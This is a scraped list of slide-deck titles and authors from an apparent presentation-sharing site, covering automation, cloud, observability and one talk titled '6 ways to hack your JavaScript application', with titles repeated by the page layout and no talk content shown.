Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Will Schroeder
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1DianaGray10
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfDaniel Santiago Silva Capera
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Adtran
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostMatt Ray
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.YounusS2
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureEric D. Schabell
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsSafe Software
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024D Cloud Solutions
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdfPedro Manuel
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfinfogdgmi
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemAsko Soukka
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding TeamAdam Moalla
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioChristian Posta
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarPrecisely
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...Aggregage
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7DianaGray10
 

Dernier (20)

20230202 - Introduction to tis-py
20230202 - Introduction to tis-py20230202 - Introduction to tis-py
20230202 - Introduction to tis-py
 
20150722 - AGV
20150722 - AGV20150722 - AGV
20150722 - AGV
 
UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6UiPath Studio Web workshop series - Day 6
UiPath Studio Web workshop series - Day 6
 
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdfIaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
IaC & GitOps in a Nutshell - a FridayInANuthshell Episode.pdf
 
Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™Meet the new FSP 3000 M-Flex800™
Meet the new FSP 3000 M-Flex800™
 
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCostKubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
KubeConEU24-Monitoring Kubernetes and Cloud Spend with OpenCost
 
Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.Basic Building Blocks of Internet of Things.
Basic Building Blocks of Internet of Things.
 
OpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability AdventureOpenShift Commons Paris - Choose Your Own Observability Adventure
OpenShift Commons Paris - Choose Your Own Observability Adventure
 
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration WorkflowsIgniting Next Level Productivity with AI-Infused Data Integration Workflows
Igniting Next Level Productivity with AI-Infused Data Integration Workflows
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
Nanopower In Semiconductor Industry.pdf
Nanopower  In Semiconductor Industry.pdfNanopower  In Semiconductor Industry.pdf
Nanopower In Semiconductor Industry.pdf
 
Videogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdfVideogame localization & technology_ how to enhance the power of translation.pdf
Videogame localization & technology_ how to enhance the power of translation.pdf
 
Bird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystemBird eye's view on Camunda open source ecosystem
Bird eye's view on Camunda open source ecosystem
 
9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team9 Steps For Building Winning Founding Team
9 Steps For Building Winning Founding Team
 
Comparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and IstioComparing Sidecar-less Service Mesh from Cilium and Istio
Comparing Sidecar-less Service Mesh from Cilium and Istio
 
AI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity WebinarAI You Can Trust - Ensuring Success with Data Integrity Webinar
AI You Can Trust - Ensuring Success with Data Integrity Webinar
 
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
The Data Metaverse: Unpacking the Roles, Use Cases, and Tech Trends in Data a...
 
UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7UiPath Studio Web workshop series - Day 7
UiPath Studio Web workshop series - Day 7
 

6 ways to hack your JavaScript application by Viktor Turskyi